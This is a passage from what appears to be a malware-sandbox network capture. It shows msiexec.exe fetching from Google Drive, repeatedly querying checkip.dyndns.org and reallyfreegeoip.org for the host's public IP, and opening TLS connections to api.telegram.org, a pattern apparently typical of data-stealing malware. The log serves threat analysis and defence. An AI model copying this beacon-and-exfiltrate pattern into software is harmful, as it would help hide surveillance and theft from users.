                                                                Oct 24, 2024 08:43:29.601574898 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.162626982 CEST44349821188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:30.164432049 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:30.164515972 CEST44349821188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:30.303762913 CEST44349821188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:30.303900957 CEST44349821188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:30.303955078 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:30.304502010 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:30.308902979 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.309902906 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.315747023 CEST8049815193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:30.315825939 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.316016912 CEST8049825193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:30.316184044 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.316313982 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:30.321907043 CEST8049825193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:31.159562111 CEST8049825193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:31.161907911 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.161950111 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.162012100 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.162337065 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.162348032 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.304728985 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.782937050 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.788126945 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.788153887 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.927088022 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.927223921 CEST44349828188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:31.927277088 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.927783966 CEST49828443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:31.931441069 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.932522058 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.937191010 CEST8049825193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:31.937243938 CEST4982580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.937891960 CEST8049834193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:31.937948942 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.938055992 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:31.943428993 CEST8049834193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:32.772559881 CEST8049834193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:32.774816036 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:32.774887085 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:32.774987936 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:32.775284052 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:32.775299072 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:32.914139986 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.384589911 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:33.387521982 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:33.387597084 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:33.528206110 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:33.528417110 CEST44349840188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:33.528693914 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:33.529275894 CEST49840443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:33.533165932 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.534347057 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.539079905 CEST8049834193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:33.539804935 CEST8049846193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:33.539875984 CEST4983480192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.539917946 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.539985895 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:33.545356035 CEST8049846193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:34.374341011 CEST8049846193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:34.377223969 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:34.377343893 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:34.377434015 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:34.377681017 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:34.377716064 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:34.587423086 CEST8049846193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:34.589802027 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:34.985188961 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:34.986773968 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:34.986788034 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:35.125041962 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:35.125149965 CEST44349852188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:35.125458002 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:35.125998020 CEST49852443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:35.129209042 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:35.130527020 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:35.135103941 CEST8049846193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:35.135175943 CEST4984680192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:35.135955095 CEST8049858193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:35.136046886 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:35.136110067 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:35.141868114 CEST8049858193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:35.970707893 CEST8049858193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:35.972632885 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:35.972681046 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:35.972754002 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:35.973115921 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:35.973130941 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:36.101815939 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:36.594320059 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:36.596105099 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:36.596148968 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:36.739379883 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:36.739480972 CEST44349864188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:36.739645004 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:36.740360022 CEST49864443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:36.772833109 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:36.778367996 CEST8049858193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:36.778465033 CEST4985880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:36.782109976 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:36.782171011 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:36.782244921 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:36.782674074 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:36.782705069 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.624516964 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.624608994 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:37.632384062 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:37.632397890 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.632626057 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.634494066 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:37.675373077 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.881506920 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.881681919 CEST44349867149.154.167.220192.168.2.4
                                                                Oct 24, 2024 08:43:37.881777048 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:37.884569883 CEST49867443192.168.2.4149.154.167.220
                                                                Oct 24, 2024 08:43:43.999392033 CEST4979380192.168.2.4193.122.6.168
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 24, 2024 08:42:24.803237915 CEST6393853192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:42:24.811325073 CEST53639381.1.1.1192.168.2.4
                                                                Oct 24, 2024 08:42:26.449443102 CEST5027653192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:42:26.457647085 CEST53502761.1.1.1192.168.2.4
                                                                Oct 24, 2024 08:43:15.619653940 CEST6085153192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:43:15.627895117 CEST53608511.1.1.1192.168.2.4
                                                                Oct 24, 2024 08:43:21.764904022 CEST4988753192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:43:21.773154020 CEST53498871.1.1.1192.168.2.4
                                                                Oct 24, 2024 08:43:23.241020918 CEST5266853192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:43:23.249068022 CEST53526681.1.1.1192.168.2.4
                                                                Oct 24, 2024 08:43:36.773502111 CEST5749653192.168.2.41.1.1.1
                                                                Oct 24, 2024 08:43:36.781352043 CEST53574961.1.1.1192.168.2.4
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 24, 2024 08:42:24.803237915 CEST192.168.2.41.1.1.10xf1cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:42:26.449443102 CEST192.168.2.41.1.1.10x1fbeStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:15.619653940 CEST192.168.2.41.1.1.10x2a1eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.764904022 CEST192.168.2.41.1.1.10xb68dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:23.241020918 CEST192.168.2.41.1.1.10x16b4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:36.773502111 CEST192.168.2.41.1.1.10x53b2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 24, 2024 08:42:24.811325073 CEST1.1.1.1192.168.2.40xf1cNo error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:42:26.457647085 CEST1.1.1.1192.168.2.40x1fbeNo error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:15.627895117 CEST1.1.1.1192.168.2.40x2a1eNo error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:21.773154020 CEST1.1.1.1192.168.2.40xb68dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:23.249068022 CEST1.1.1.1192.168.2.40x16b4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:23.249068022 CEST1.1.1.1192.168.2.40x16b4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 08:43:36.781352043 CEST1.1.1.1192.168.2.40x53b2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                • reallyfreegeoip.org
                                                                • api.telegram.org
                                                                • checkip.dyndns.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449768193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:21.787389994 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:22.623219013 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 5ed81c36d4255057cf7201edec25e113
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                Oct 24, 2024 08:43:22.627597094 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 24, 2024 08:43:22.871488094 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: a684c8711c2609f0cb4095b443951396
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                Oct 24, 2024 08:43:24.437287092 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 24, 2024 08:43:24.681509018 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 4cc193e8b5f51b66e788e7b1277b466a
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                Oct 24, 2024 08:43:24.899486065 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 4cc193e8b5f51b66e788e7b1277b466a
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449793193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:25.458825111 CEST127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Oct 24, 2024 08:43:26.305701971 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: f064036b4b1dbe6d889dac73019749e5
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449803193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:27.078985929 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:27.928158045 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:27 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 237a3621a91a3d5279c097fa07b7ac03
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449815193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:28.718022108 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:29.551281929 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: ac1dc3e7db59d8044383c8de1c54d417
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449825193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:30.316313982 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:31.159562111 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:31 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 1d2f205a8a691c7f3593247b72e68691
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449834193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:31.938055992 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:32.772559881 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: eb944933899ee517421b3631df207098
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449846193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:33.539985895 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:34.374341011 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:34 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: f24d0b27034613de88824e12ea5b3dcc
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                Oct 24, 2024 08:43:34.587423086 CEST323INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:34 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: f24d0b27034613de88824e12ea5b3dcc
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449858193.122.6.168805496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 24, 2024 08:43:35.136110067 CEST151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Oct 24, 2024 08:43:35.970707893 CEST323INHTTP/1.1 200 OK
